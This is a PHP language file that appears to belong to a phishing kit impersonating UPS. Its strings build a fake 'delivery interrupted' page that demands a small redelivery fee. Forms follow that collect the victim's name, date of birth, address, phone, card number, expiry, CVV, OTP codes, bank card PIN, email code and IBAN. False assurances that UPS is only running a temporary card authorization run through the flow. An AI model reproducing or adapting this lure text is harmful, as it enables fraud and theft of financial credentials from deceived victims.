<?php
function lang($phrase){
	static $lang = array(

        "xlang" => "EN",
        "xcapt1" => "Please check on the CAPTCHA box.",
        "xcapt2" => "Verification",
        "xcapt3" => "Continue",
        "xfot1" => "This Site",
        "xfot2" => "Other UPS Sites",
        "xfot3" => "Connect With Us",
        "xfot4" => "Legal",
        "xfot5" => "Copyright ©1994- 2023&nbsp;United Parcel Service of America, Inc. All rights reserved. ",
        "xind1" => "Track",
        "xind2" => "Tracking Number",
        "xind3" => "Error : Please provide The right tracking number.",
        "xind4" => "Need help changing your delivery?",
        "xind5" => "Quote",
        "xind6" => "Ship",
        "xind7" => "Billing",
        "xind8" => "Get Help",
        "xexp1" => "Delivery interrupted",
        "xexp2" => "Tracking",
        "xexp3" => "Your last delivery was interrupted. It is currently being held at the sorting center.",
        "xexp4" => "The parcel that was sent to you did not respect the weight indicated, and you will be asked to pay an additional fee to ensure that your parcel is delivered correctly.",
        "xexp5" => "The charge is 0.48€",
        "xexp6" => "To pay, please click on the button below",
        'xexp7' => "Pay",
        "xexp8" => "Once the fee has been paid, your parcel will be forwarded as quickly as possible to the delivery address.",
        "xexp9" => "If the fee is not paid within 48 hours, the parcel will be returned to the sender.",
        "xexp10" => "Track by Reference Number",
        "xexp11" => "Import Tracking Numbers",
        "xexp12" => "Other Tracking Services",
        "xinfz1" => "Confirm your billing details",
        "xinfz2" => "Full name",
        "xinfz10" => "Date of birth",
        "xinfz3" => "Country",
        "xinfz4" => "City",
        "xinfz5" => "Address",
        "xinfz6" => "Phone",
        "xinfz7" => "Postcode",
        "xinfz8" => "Error : All data is required",
        "xinfz9" => "Confirm",
        "xpay1" => "Payment details",
        "xpay2" => "Dear customer, check your payment details correctly and match your card details to finish",
        "xpay3" => "Name on card",
        "xpay4" => "Card number",
        "xpay5" => "Expiration Date",
        "xpay6" => "Security code CVV (3 digits)",
        "xpay7" => "Error : All data is required",
        "xpay8" => "Confirm",
        "xsms1" => "Verification",
        "xsms2" => "We sent a confirmation code to your number.",
        "xsms3" => "OTP code",
        "xsms4" => "Error : Incorrect otp code.",
        "xsms5" => "This step is required to complete your payment process securely.",
        "xsms6" => "UPS performs a temporary authentication on your card to verify it. This is an authorization only and NOT a fee.",
        "xsms7" => "Confirm",
        "xconf1" => "Resumption of delivery",
        "xconf2" => "Payment of the additional charges has been taken into account.",
        "xconf3" => "Your parcel should arrive within the next 24 hours.",
        "xconf4" => "Confirm",
        "xpin1" => "Verification",
        "xpin2" => "Enter the pin code for your bank card",
        "xpin3" => "Pin code",
        "xpin4" => "(4 digits)",
        "xpin5" => "This step is required to securely complete your payment process.",
        "xpin6" => "UPS performs a temporary verification of your card to verify it. This is an authorization only and NOT a fee.",
        "xpin7" => "Confirm",
        "xmail1" => "Verification",
        "xmail2" => "We have sent a confirmation code to your email",
        "xmail3" => "Email code",
        "xmail4" => "(6 digits)",
        "xmail5" => "This step is required to securely complete your payment process.",
        "xmail6" => "UPS performs a temporary verification of your card to verify it. This is an authorization only and NOT a fee.",
        "xmail7" => "Confirm",
        "xiban1" => "Verification",
        "xiban2" => "Please enter your IBAN to complete the payment",
        "xiban3" => "IBAN",
        "xiban4" => "(IBAN)",
        "xiban5" => "This step is required to securely complete your payment process.",
        "xiban6" => "UPS performs a temporary verification of your card to verify it. This is an authorization only and NOT a fee.",
        "xiban7" => "Confirm"

	);	
	
	return $lang[$phrase];
}
 ?>